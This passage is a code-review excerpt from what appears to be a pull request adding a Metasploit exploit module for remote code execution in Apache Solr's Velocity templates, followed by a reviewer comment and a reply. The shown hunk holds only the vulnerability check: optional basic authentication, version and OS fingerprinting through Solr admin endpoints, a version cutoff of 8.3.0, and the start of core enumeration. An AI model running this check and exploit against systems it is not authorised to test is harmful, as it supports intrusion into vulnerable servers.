modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,354 @@
+      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
+      # no creds provided means we cannot reliably check exploitability
+      if datastore['USERNAME'] == nil and datastore['PASSWORD'] == nil
+        print_error("Credentials not provided, skipping credentialed check...")
+        return CheckCode::Unknown
+      # otherwise, attempt authentication
+      else
+        print_status("Attempting authentication for #{peer}...")
+        attempt_auth = send_request_cgi({
+                       'method'  => 'GET',
+                       'headers' => {
+                                      'Connection'    => 'Keep-Alive',
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        unless attempt_auth.code == 200
+          print_status("Authentication failed!")
+          return CheckCode::Unknown
+        end
+
+        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        # TODO: add creds to MSF database
+      end
+    end
+
+    # if successful authentication happens, user the authorization header for the rest of the check
+    if @auth_string == ""
+      @headers = {
+        'Connection'   => 'Keep-Alive',
+      }
+    else
+      @headers = {
+        'Connection'      => 'Keep-Alive',
+        'Authorization'   => @auth_string.to_s
+      }
+    end
+
+    # send a GET request to get Solr and system details
+    ver = send_request_cgi({
+          'method'  => 'GET',
+          'headers' => @headers,
+          'uri'     => '/solr/admin/info/system?wt=json'
+      })
+
+    # can't connect? that's an automatic failure
+    unless ver
+      vprint_error("Connection failed!")
+      return CheckCode::Unknown
+    end
+
+    # convert to JSON
+    ver_json = ver.get_json_document
+    # get Solr version
+    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
+    print_status("Found Apache Solr #{@solr_version}")
+    # get OS version details
+    @target_platform = ver_json['system']['name']
+    @target_arch = ver_json['system']['arch']
+    @target_osver = ver_json['system']['version']
+    print_status("OS version is #{@target_platform} #{@target_arch} #{@target_osver}")
+    # uname doesn't show up for Windows, so run a check for that.
+    if ver_json['system']['uname']
+      @uname = ver_json['system']['uname'].strip
+      # print uname only when verbose
+      vprint_status("Full uname is '#{@uname}'")
+    end
+
+    # the vulnerability is only present in Solr versions <= 8.3.0
+    unless @solr_version <= Gem::Version.new('8.3.0')
+      return CheckCode::Safe
+    end
+
+    # enumerate cores
+    cores = send_request_cgi({
+            'method'  => 'GET',
+            'headers' => @headers,
+            'uri'     => '/solr/admin/cores?wt=json'
```

Comment:
Please use `vars_get` for HTTP GET parameters.

Reply:
Unnecessary, removed in commit 046d8cbedc659abf7ec2edeb922b3df71c046a22.